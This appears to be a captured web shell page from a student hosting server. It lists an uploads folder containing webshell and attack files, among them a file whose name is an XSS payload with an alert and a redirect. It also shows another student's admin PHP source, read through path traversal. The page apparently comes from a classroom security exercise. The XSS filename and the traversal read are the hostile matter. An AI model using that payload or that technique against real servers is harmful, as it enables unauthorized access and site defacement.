📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../587164.klas4s23.mid-ica.nl/public_html/ELearner/admin_user_lists.php

<?php session_start(); include "db.php"; // Check if user is logged in and is admin if (!isset($_SESSION['user_id']) || !isset($_SESSION['is_admin']) || $_SESSION['is_admin'] != 1) { header("Location: login.php"); exit(); } $error_message = ""; $success_message = ""; // Get user IDs from URL $user_ids = isset($_GET['user_ids']) ? explode(',', $_GET['user_ids']) : []; // Validate user IDs (ensure they're numeric) $valid_user_ids = []; foreach ($user_ids as $id) { if (is_numeric($id)) { $valid_user_ids[] = (int)$id; } } if (empty($valid_user_ids)) { $error_message = "No valid user IDs provided."; } // Handle list actions if submitted if ($_SERVER["REQUEST_METHOD"] == "POST") { if (isset($_POST['delete_list']) && isset($_POST['list_id'])) { $list_id = (int)$_POST['list_id']; try { $stmt = $conn->prepare("DELETE FROM word_lists WHERE id = ?"); $stmt->execute([$list_id]); $success_message = "List deleted successfully."; } catch (PDOException $e) { $error_message = "Error deleting list: " . $e->getMessage(); } } if (isset($_POST['toggle_public']) && isset($_POST['list_id'])) { $list_id = (int)$_POST['list_id']; $is_public = (int)$_POST['is_public']; $new_status = $is_public ? 0 : 1; try { $stmt = $conn->prepare("UPDATE word_lists SET public = ? WHERE id = ?"); $stmt->execute([$new_status, $list_id]); $success_message = "List visibility updated successfully."; } catch (PDOException $e) { $error_message = "Error updating list visibility: " . $e->getMessage(); } } } // Get user data and lists $users = []; $lists = []; if (!empty($valid_user_ids)) { $placeholders = implode(',', array_fill(0, count($valid_user_ids), '?')); // Get users try { $stmt = $conn->prepare("SELECT id, username, profile_photo, banned_until FROM users WHERE id IN ($placeholders)"); $stmt->execute($valid_user_ids); $users = $stmt->fetchAll(); } catch (PDOException $e) { $error_message = "Error fetching users: " . $e->getMessage(); } // Get lists for each user try { $stmt = $conn->prepare(" SELECT wl.*, (SELECT COUNT(*) FROM list_words WHERE list_id = wl.id) as word_count FROM word_lists wl WHERE wl.user_id IN ($placeholders) ORDER BY wl.user_id, wl.created_at DESC "); $stmt->execute($valid_user_ids); $all_lists = $stmt->fetchAll(); // Group lists by user_id foreach ($all_lists as $list) { if (!isset($lists[$list['user_id']])) { $lists[$list['user_id']] = []; } $lists[$list['user_id']][] = $list; } } catch (PDOException $e) { $error_message = "Error fetching lists: " . $e->getMessage(); } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>User Lists - Admin Panel - ELearner</title> <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"> <link rel="stylesheet" href="styles.css"> <link rel="stylesheet" href="font-styles.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"> <style> .profile-thumbnail { width: 40px; height: 40px; border-radius: 50%; object-fit: cover; } .profile-placeholder { width: 40px; height: 40px; border-radius: 50%; background-color: #e5e7eb; display: flex; align-items: center; justify-content: center; color: #9ca3af; } </style> </head> <body class="bg-gray-100 min-h-screen"> <div class="container mx-auto px-4 py-4 sm:py-8"> <header class="bg-white rounded-lg shadow-md p-4 sm:p-6 mb-6 sm:mb-8"> <div class="flex flex-wrap items-center justify-between"> <div class="flex items-center"> <a href="homepage.php"> <img src="images/icon-e-learner-blue.png" alt="ELearner Logo" class="h-10 sm:h-12 mr-3 sm:mr-4"> </a> <div> <h1 class="text-2xl sm:text-3xl font-bold text-blue-600">ELearner</h1> <p class="text-sm sm:text-base text-gray-600">Admin Panel - User Lists</p> </div> </div> <nav id="desktopMenu" class="hidden md:block"> <ul class="flex space-x-4 sm:space-x-6"> <li><a href="homepage.php" class="text-blue-500 font-medium hover:underline">Home</a></li> <li><a href="index.php" class="text-blue-500 font-medium hover:underline">Vocabulary Tool</a></li> <li><a href="my_lists.php" class="text-blue-500 font-medium hover:underline">My Lists</a></li> <li><a href="list_hub.php" class="text-blue-500 font-medium hover:underline">List Hub</a></li> <li><a href="profile.php" class="text-blue-500 font-medium hover:underline">My Profile</a></li> <li><a href="admin.php" class="text-purple-500 font-medium hover:underline">Admin</a></li> <li><a href="logout.php" class="text-red-500 font-medium hover:underline">Logout</a></li> <li> <button id="fontToggleBtn" class="bg-purple-500 text-white px-3 py-1 rounded hover:bg-purple-600"> Toggle Font </button> </li> </ul> </nav>  <button id="mobileMenuBtn" class="md:hidden p-2 rounded text-blue-600 hover:bg-blue-100"> <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16"></path> </svg> </button> </div>  <nav id="mobileMenu" class="md:hidden hidden mt-4 pb-2"> <ul class="flex flex-col space-y-3"> <li><a href="homepage.php" class="block text-blue-500 font-medium hover:underline">Home</a></li> <li><a href="index.php" class="block text-blue-500 font-medium hover:underline">Vocabulary Tool</a></li> <li><a href="my_lists.php" class="block text-blue-500 font-medium hover:underline">My Lists</a></li> <li><a href="list_hub.php" class="block text-blue-500 font-medium hover:underline">List Hub</a></li> <li><a href="profile.php" class="block text-blue-500 font-medium hover:underline">My Profile</a></li> <li><a href="admin.php" class="block text-purple-500 font-medium hover:underline">Admin</a></li> <li><a href="logout.php" class="block text-red-500 font-medium hover:underline">Logout</a></li> <li> <button id="mobileFontToggleBtn" class="bg-purple-500 text-white px-3 py-1 rounded hover:bg-purple-600"> Toggle Font </button> </li> </ul> </nav> </header> <main class="bg-white rounded-lg shadow-md p-4 sm:p-6"> <div class="flex justify-between items-center mb-6"> <h2 class="text-xl sm:text-2xl font-bold">User Lists</h2> <a href="admin.php" class="text-blue-500 hover:underline"> <i class="fas fa-arrow-left mr-1"></i> Back to Admin Panel </a> </div> <?php if ($error_message): ?> <div class="bg-red-100 border border-red-400 text-red-700 px-4 py-3 rounded mb-4" role="alert"> <p><?php echo $error_message; ?></p> </div> <?php endif; ?> <?php if ($success_message): ?> <div class="bg-green-100 border border-green-400 text-green-700 px-4 py-3 rounded mb-4" role="alert"> <p><?php echo $success_message; ?></p> </div> <?php endif; ?> <?php if (empty($users)): ?> <div class="bg-gray-100 p-4 rounded text-center"> <p class="text-gray-500">No users found with the provided IDs.</p> </div> <?php else: ?> <?php foreach ($users as $user): $now = new DateTime(); $is_banned = !empty($user['banned_until']) && new DateTime($user['banned_until']) > $now; ?> <div class="border rounded-lg mb-6 overflow-hidden"> <div class="bg-gray-50 p-4 flex items-center"> <div class="mr-3"> <?php if (!empty($user['profile_photo']) && file_exists($user['profile_photo'])): ?> <img src="<?= htmlspecialchars($user['profile_photo']) ?>" alt="Profile Photo" class="profile-thumbnail"> <?php else: ?> <div class="profile-placeholder"> <i class="fas fa-user"></i> </div> <?php endif; ?> </div> <div> <h3 class="font-bold"><?= htmlspecialchars($user['username']) ?></h3> <p class="text-sm text-gray-500">User ID: <?= $user['id'] ?></p> <?php if ($is_banned): ?> <p class="text-sm text-red-500"> <i class="fas fa-ban mr-1"></i> Banned until: <?= date('M j, Y, g:i a', strtotime($user['banned_until'])) ?> </p> <?php endif; ?> </div> </div> <?php if (empty($lists[$user['id']])): ?> <div class="p-4 text-center text-gray-500"> This user has no word lists. </div> <?php else: ?> <div class="overflow-x-auto"> <table class="min-w-full"> <thead> <tr class="bg-gray-200"> <th class="p-2 text-left">List ID</th> <th class="p-2 text-left">Name</th> <th class="p-2 text-left">Words</th> <th class="p-2 text-left">Created</th> <th class="p-2 text-left">Score</th> <th class="p-2 text-left">Status</th> <th class="p-2 text-left">Actions</th> </tr> </thead> <tbody> <?php foreach ($lists[$user['id']] as $list): ?> <tr class="border-t hover:bg-gray-50"> <td class="p-2"><?= $list['id'] ?></td> <td class="p-2 font-medium"><?= htmlspecialchars($list['name']) ?></td> <td class="p-2"><?= $list['word_count'] ?></td> <td class="p-2"><?= date('M j, Y', strtotime($list['created_at'])) ?></td> <td class="p-2"> <?php if ($list['score'] !== null): ?> <span class="<?= $list['score'] >= 80 ? 'text-green-600' : ($list['score'] >= 50 ? 'text-yellow-600' : 'text-red-600') ?>"> <?= $list['score'] ?>% </span> <?php else: ?> <span class="text-gray-400">N/A</span> <?php endif; ?> </td> <td class="p-2"> <?php if ($list['public']): ?> <span class="inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium bg-green-100 text-green-800"> <i class="fas fa-globe mr-1"></i> Public </span> <?php else: ?> <span class="inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium bg-gray-100 text-gray-800"> <i class="fas fa-lock mr-1"></i> Private </span> <?php endif; ?> <?php if ($list['is_copy']): ?> <span class="inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium bg-orange-100 text-orange-800 ml-1"> <i class="fas fa-copy mr-1"></i> Copied </span> <?php endif; ?> </td> <td class="p-2"> <div class="flex space-x-2"> <a href="admin_view_list.php?list_id=<?= $list['id'] ?>" class="text-blue-500 hover:text-blue-700" title="View List Contents"> <i class="fas fa-eye"></i> </a> <form method="post" class="inline"> <input type="hidden" name="list_id" value="<?= $list['id'] ?>"> <input type="hidden" name="is_public" value="<?= $list['public'] ?>"> <button type="submit" name="toggle_public" class="text-<?= $list['public'] ? 'green' : 'gray' ?>-500 hover:text-<?= $list['public'] ? 'green' : 'gray' ?>-700" title="<?= $list['public'] ? 'Make Private' : 'Make Public' ?>"> <i class="fas fa-<?= $list['public'] ? 'globe' : 'lock' ?>"></i> </button> </form> <form method="post" class="inline" onsubmit="return confirm('Are you sure you want to delete this list? This action cannot be undone.');"> <input type="hidden" name="list_id" value="<?= $list['id'] ?>"> <button type="submit" name="delete_list" class="text-red-500 hover:text-red-700" title="Delete List"> <i class="fas fa-trash-alt"></i> </button> </form> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <?php endif; ?> </div> <?php endforeach; ?> <?php endif; ?> </main> </div> <script> // Mobile menu toggle document.getElementById("mobileMenuBtn").addEventListener("click", function() { const mobileMenu = document.getElementById("mobileMenu"); mobileMenu.classList.toggle("hidden"); }); // Copy font toggle functionality to mobile button if (document.getElementById("mobileFontToggleBtn")) { document.getElementById("mobileFontToggleBtn").addEventListener("click", function() { document.getElementById("fontToggleBtn").click(); }); } </script> <script src="font-toggle.js"></script> </body> </html>

🎯 Available Actions

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!

🐚 WEB SHELL ACTIVATED

📁 File Browser

📄 Viewing: ./../../../../587164.klas4s23.mid-ica.nl/public_html/ELearner/admin_user_lists.php

🎯 Available Actions

Command Execution:

Quick Commands:

File Operations: